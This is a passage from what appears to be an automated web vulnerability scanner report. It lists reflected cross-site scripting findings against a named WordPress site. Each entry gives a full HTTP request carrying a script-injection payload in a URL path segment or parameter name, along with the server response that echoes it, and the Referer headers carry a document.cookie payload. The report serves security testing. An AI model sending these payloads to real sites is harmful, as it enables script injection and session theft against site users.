GET /wp-content9a40c"><script>alert(1)</script>edd1009451f/themes/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content9a40c\"><script>alert(1)</script>edd1009451f/themes/rt_mynxx_wp/css/typography.css" type="hidden" />
...[SNIP]...

1.211. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f80"><script>alert(1)</script>99d09042358 was submitted in the REST URL parameter 2. This input was echoed as a1f80\"><script>alert(1)</script>99d09042358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa1f80"><script>alert(1)</script>99d09042358/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themesa1f80\"><script>alert(1)</script>99d09042358/rt_mynxx_wp/css/typography.css" type="hidden" />
...[SNIP]...

1.212. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92458"><script>alert(1)</script>69527ee13c9 was submitted in the REST URL parameter 3. This input was echoed as 92458\"><script>alert(1)</script>69527ee13c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp92458"><script>alert(1)</script>69527ee13c9/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp92458\"><script>alert(1)</script>69527ee13c9/css/typography.css" type="hidden" />
...[SNIP]...

1.213. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29c1"><script>alert(1)</script>4cf7d2ba27e was submitted in the REST URL parameter 4. This input was echoed as d29c1\"><script>alert(1)</script>4cf7d2ba27e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/cssd29c1"><script>alert(1)</script>4cf7d2ba27e/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/cssd29c1\"><script>alert(1)</script>4cf7d2ba27e/typography.css" type="hidden" />
...[SNIP]...

1.214. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5819a"><script>alert(1)</script>9a753a5b1d was submitted in the REST URL parameter 5. This input was echoed as 5819a\"><script>alert(1)</script>9a753a5b1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css5819a"><script>alert(1)</script>9a753a5b1d HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:26 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css5819a\"><script>alert(1)</script>9a753a5b1d" type="hidden" />
...[SNIP]...

1.215. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2afa"><script>alert(1)</script>b46c25ec446 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2afa\"><script>alert(1)</script>b46c25ec446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css?e2afa"><script>alert(1)</script>b46c25ec446=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css?e2afa\"><script>alert(1)</script>b46c25ec446=1" type="hidden" />
...[SNIP]...

1.216. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34d1"><script>alert(1)</script>748b167765a was submitted in the REST URL parameter 1. This input was echoed as c34d1\"><script>alert(1)</script>748b167765a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentc34d1"><script>alert(1)</script>748b167765a/themes/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentc34d1\"><script>alert(1)</script>748b167765a/themes/rt_mynxx_wp/css/wp.css" type="hidden" />
...[SNIP]...

1.217. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf91"><script>alert(1)</script>626365865a6 was submitted in the REST URL parameter 2. This input was echoed as 8cf91\"><script>alert(1)</script>626365865a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes8cf91"><script>alert(1)</script>626365865a6/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes8cf91\"><script>alert(1)</script>626365865a6/rt_mynxx_wp/css/wp.css" type="hidden" />
...[SNIP]...

1.218. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c13"><script>alert(1)</script>2d765b40d27 was submitted in the REST URL parameter 3. This input was echoed as e1c13\"><script>alert(1)</script>2d765b40d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpe1c13"><script>alert(1)</script>2d765b40d27/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpe1c13\"><script>alert(1)</script>2d765b40d27/css/wp.css" type="hidden" />
...[SNIP]...

1.219. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82120"><script>alert(1)</script>9823ffbbc86 was submitted in the REST URL parameter 4. This input was echoed as 82120\"><script>alert(1)</script>9823ffbbc86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css82120"><script>alert(1)</script>9823ffbbc86/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css82120\"><script>alert(1)</script>9823ffbbc86/wp.css" type="hidden" />
...[SNIP]...

1.220. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac4d1"><script>alert(1)</script>a686e148c2f was submitted in the REST URL parameter 5. This input was echoed as ac4d1\"><script>alert(1)</script>a686e148c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.cssac4d1"><script>alert(1)</script>a686e148c2f HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.cssac4d1\"><script>alert(1)</script>a686e148c2f" type="hidden" />
...[SNIP]...

1.221. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b124"><script>alert(1)</script>cdcdc3bd480 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b124\"><script>alert(1)</script>cdcdc3bd480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css?5b124"><script>alert(1)</script>cdcdc3bd480=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css?5b124\"><script>alert(1)</script>cdcdc3bd480=1" type="hidden" />
...[SNIP]...

1.222. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8df1"><script>alert(1)</script>df54dde89f2 was submitted in the REST URL parameter 1. This input was echoed as f8df1\"><script>alert(1)</script>df54dde89f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf8df1"><script>alert(1)</script>df54dde89f2/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
